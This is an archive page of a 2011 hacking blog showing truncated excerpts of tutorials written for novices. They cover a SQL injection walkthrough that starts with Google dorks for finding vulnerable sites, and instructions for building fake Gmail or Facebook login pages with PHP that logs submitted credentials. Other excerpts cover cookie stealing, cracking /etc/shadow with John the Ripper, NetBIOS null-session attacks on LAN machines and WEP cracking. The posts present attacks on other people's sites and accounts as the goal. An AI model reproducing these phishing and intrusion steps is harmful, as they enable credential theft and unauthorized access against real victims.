Posts

Showing posts from January, 2011

Fast-Track - an automated penetration tool for Linux

Fast-Track is a Python-based open-source project aimed at helping penetration testers identify, exploit, and further penetrate a network. Fast-Track was originally conceived when a h4cker was on a penetration test and found that there was generally a lack of tools or automation for certain attacks that were normally extremely advanced and time consuming. In an effort to reproduce some advanced attacks and propagate them down, he ended up writing Fast-Track for the public. Many of the issues Fast-Track exploits are due to improper sanitizing of client-side data within web applications, poor patch management, or a lack of hardening techniques. All of these are relatively simple to fix if you know what to look for, but for us as penetration testers they are extremely common findings. Fast-Track arms the penetration tester with advanced attacks that in most cases have never been performed before. Sit back, relax, crank open a can of Jolt cola and enjoy the ride. Installing Fast-Track: mak...

Tutorial: SQL injection

Advanced SQL injection tutorial. Of all the hacks so far, the one most used by h4ck3rs, from n00b to 1337, has been the SQL injection attack. Here at hackiteasy we present a tutorial on how to apply SQL injection to websites. This trick has been found to work on a huge number of sites. The hack starts as follows. Finding a vulnerable site: To find a vulnerable site, open Google and type in a dork like "inurl:index.php?id=" (without quotes); there are many other similar formats for finding such vulnerable pages. Now click on any site like http://www.yoursite.com/index.php?id=786 Now, to test whether the site is hackable or not, add a ' at the end of the URL. If the site gives an error like "You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'84' at line 1" we can assume that it is vulnerable. If not, try some other site. We have the vulnerable site now. So let's try with differe...

Creating a fake (phishing) page of Gmail, Facebook, Orkut, MySpace etc.

Phishing has become a very easy-to-use trick to hack the usernames and passwords of users. Here we demonstrate how to create a fake phishing page for almost any social networking site, email service or any other site that has a login form. For this trick you would need a hosting account, which you can get easily. Register yourself at t35, host1free, 110mb etc. Note: 110mb checks for phishing pages on their site and removes them. So now you have a hosting account, so let's create a fake page. First go to the target site. In your browser select Save As from the File menu and save the site on your hard disk with the name "login.htm", or alternatively right click on the page, click "view source", copy all of it and save it to a Notepad file. Rename the file to "login.htm". Now the second part of the hack: go to Notepad and copy this into it: <?php header ('Location: http://www.facebook.com'); $handle = fopen("log.txt", "a"); foreach($_POST as...

Installing John the Ripper on a Linux machine

John the Ripper is undoubtedly one of the best password cracking tools. People have been experiencing some problems installing it, so here we bring out a tutorial on how to install the famous password cracker on a Linux machine. This is the method to install and use John the Ripper on Fedora/Ubuntu (and many other Linux distributions as well). 1) Download the John the Ripper software: http://www.ziddu.com/download/6365223/jo...ar.gz.html 2) Extract it and then copy the text from http://www.openwall.com/lists/john-users/2009/09/02/3 3) Save the copied text in the john folder as john.patch. 4) Open a terminal and go to the john folder: cd Desktop/john-1.7.3.1 5) Now we have to patch our john software with the following command: patch -Np1 -i john.patch 6) Go to the src folder: cd src 7) Run this command: make linux-x86-sse2 8) cd .. and go to the run folder: cd run 9) Run this command: ./unshadow /etc/passwd /etc/shadow > filename 10) Finally run this command to crack passwords: ./john filename and here you have the ripper run...

Installing Nessus on Ubuntu

Installing Nessus on an Ubuntu or any other Linux machine can be a difficult task. So here we bring out a tutorial to simplify the task of installing the Nessus server. Here we have shown the installation on an Ubuntu machine; this could be used on any other Debian-based Linux as well. The tutorial starts here: Download Nessus-4.0.1-ubuntu810_amd64.deb for Ubuntu 9.04 from http://www.nessus.org. dpkg -i Nessus-4.0.1-ubuntu810_amd64.deb Selecting previously deselected package nessus. (Reading database … 128086 files and directories currently installed.) Unpacking nessus (from Nessus-4.0.1-ubuntu810_amd64.deb) … Setting up nessus (4.0.1) … nessusd (Nessus) 4.0.1. for Linux (C) 1998 – 2009 Tenable Network Security, Inc. – Please run /opt/nessus/sbin/nessus-adduser to add a user – Register your Nessus scanner at http://www.nessus.org/register/ to obtain all the newest plugins – You can start nessusd by typing /etc/init.d/nessusd start root@testserver:~# /opt/nessus/sbin/nessus-...

Hacking tools that every hacker must have

We (hackiteasy.com) present another list of the must-have hacking tools every hacker needs. These tools make the life of a hacker much easier and every n00b must first learn how to use them. AIRCRACK: Aircrack-ng is an 802.11 WEP and WPA-PSK key cracking program that can recover keys once enough data packets have been captured. It implements the standard FMS attack along with some optimizations like KoreK attacks, as well as the all-new PTW attack, thus making the attack much faster compared to other WEP cracking tools. In fact, Aircrack-ng is a set of tools for auditing wireless networks. Site URL: http://www.aircrack-ng.org/ BackTrack: BackTrack is a Linux distribution focused on penetration testing. Site URL: http://www.bactrack-linux.org BarsWF: BarsWF is the world's fastest MD5 brute-forcing password cracker, just in case you didn't already know. It combines your computer's processor with your graphics card's GPU to compute the largest number of hashes as quickly...

Session hijacking or cookie stealing using PHP and JavaScript

In computer science, session hijacking refers to the exploitation of a valid computer session—sometimes also called a session key—to gain unauthorized access to information or services in a computer system. In particular, it is used to refer to the theft of a magic cookie used to authenticate a user to a remote server. It has particular relevance to web developers, as the HTTP cookies used to maintain a session on many web sites can be easily stolen by an attacker using an intermediary computer or with access to the saved cookies on the victim's computer (see HTTP cookie theft). Here we show how you can hack a session using JavaScript and PHP. What is a cookie? A cookie, also known as a web cookie or HTTP cookie, is a small piece of text stored by the user's browser. A cookie is sent as a header by the web server to the web browser on the client side. A cookie is static and is sent back by the browser unchanged every time it accesses the server. A cookie has an expiration time that is set by t...

Finding the admin page of any site

A web site can easily be hacked if you know how to hack the admin of the website. For that you need to know the admin page of the website, and finding it can be a headache sometimes. So here is a page made by a hacker that does the work for you and searches the site for the admin page. http://sc0rpion.ir/af/ Just go to the site and enter the URL of the site or blog followed by a "/" and it will search for all those pages it thinks to be admin pages. Quite simple. How it works: the site has a huge list of admin page names that commonly occur on the web. The site just appends those one by one and tests whether a page by that name exists or not. If there is any admin page it will show up.

The top 10 password breakers/crackers

The best password crackers. The list is made from all password breakers from all over the globe, including versions for Unix and Windows as well. 1. Cain and Abel: The top password recovery tool for Windows. UNIX users often smugly assert that the best free security tools support their platform first, and Windows ports are often an afterthought. They are usually right, but Cain & Abel is a glaring exception. This Windows-only password recovery tool handles an enormous variety of tasks. It can recover passwords by sniffing the network, cracking encrypted passwords using Dictionary, Brute-Force and Cryptanalysis attacks, recording VoIP conversations, decoding scrambled passwords, revealing password boxes, uncovering cached passwords and analyzing routing protocols. 2. John the Ripper: A powerful, flexible, and fast multi-platform password hash cracker. John the Ripper is a fast password cracker, currently available for many flavors of Unix (11 are officially supported, not counting diff...

Hack a computer in your LAN (Windows)

Here we hack a PC somewhere in our LAN. This is a simple trick that uses an open port to gain access to the target computer. The LAN hacking technique takes advantage of port 139, which on a LAN will remain open most of the time. Today I will write about hacking a computer inside the LAN network. First of all, I will do a port scan of the target computer, which is 192.168.40.128. This computer is inside my LAN network. I will scan it using Nmap. I get the result and it shows that port 139 is open for me. Now you will need both of these tools: ** USER2SID & SID2USER ** NetBios Auditing Tool. You can get both of them on the Internet. After you get both of them, put them in the C:\ directory. You now need to create a null session to the target computer. Now open the Command Prompt and browse to the ...

WiFiSlax: a Linux made for wireless hacking

Ever tried downloading those drivers (madwifi), or installing so much software on Linux for wireless testing and penetration? Now you won't have to sweat it out; the WifiSlax team does it for you. WifiSlax is a version of the Slax OS made exclusively for wireless hacking. It comes with a bunch of wireless tools preloaded into it. These include Aircrack, Airsnort, Kismet, madwifi drivers and many more... When we tried using one of those we came to know that the distro is made in Spain and thus all of its content was in Spanish, but no worries: we translated that, and the language of Linux is the same all over, so it proved to be no big problem. Know more about Slax Linux. Get WifiSlax here: wifislax.com (Google-translated English version). Download page: http://www.wifislax.com/descargas.php

Hacking a WEP key with airodump on Ubuntu

A WEP key can easily be cracked with a simple combination of tools on a Linux machine. WEP cracking is made easier by the flaws in the design of WEP encryption that make it so vulnerable. These tools are already built into the BackTrack Linux about which I posted recently, but you can install these hacking tools separately on any Linux distro as well. These steps are made for an Ubuntu machine and use the Debian package format, which is the format for Ubuntu. Specific versions of each hack tool are available for almost all leading Linux versions. The hack starts: Install aircrack-ng on Debian Etch by: sudo apt-get install aircrack-ng Then start aircrack-ng to look for wireless networks: sudo airodump-ng eth1 Then note the channel number of the wireless network you want to crack. Quit aircrack-ng and start it again with the specific channel number to collect packets faster: sudo airodump-ng -c 4 -w dump eth1 Then wait and let it collect about 500K IVs and then try to do the act...

BackTrack: the Linux distro made for and by hackers

Linux is obviously the best tool to try your hacking skills on, as it is robust, made by hackers, gives you all tools for free and lets you do what you want to do with it. To start your hacking stuff you need to get a lot of tools, and you might get stuck when some tool starts creating errors and wish that your system had all of these beforehand. Here BackTrack comes into the picture. BackTrack Linux is just what every hacker dreams of: a full system preloaded with every tool you would ever have wished for. It has almost every tool ever invented for hackers to lay their hands on. BackTrack is intended for all audiences, from the most savvy security professionals to early newcomers to the information security field. BackTrack promotes a quick and easy way to find and update the largest collection of security tools to date. Our community of users ranges from skilled penetration testers in the information security field, government entities, information technology, security enthusiasts, a...

Wireless hacking tutorial using BackTrack

Wireless hacking with BackTrack 3 is easy to do; in this article I'd like to guide you through wireless hacking with BackTrack 3. This tutorial is made based on some requests by my subscribers; they've become familiar enough with BackTrack 3, which is why I made this wireless hacking with BackTrack 3 tutorial. In order to start the wireless hacking, you need to make sure that you have met these requirements: - BackTrack 3 or a newer release - 1 wireless router - a laptop with a wireless card. And let the hack begin: In order to crack a WEP key you must have a large number of encrypted packets to work with. This is an unavoidable requirement if you wish to be successful. The best way to get a large number of packets is to perform an ARP request reinjection attack (otherwise known as attack -3). In order to do this attack and get results there must be a client already authenticated with the AP, or connecting to the AP. ...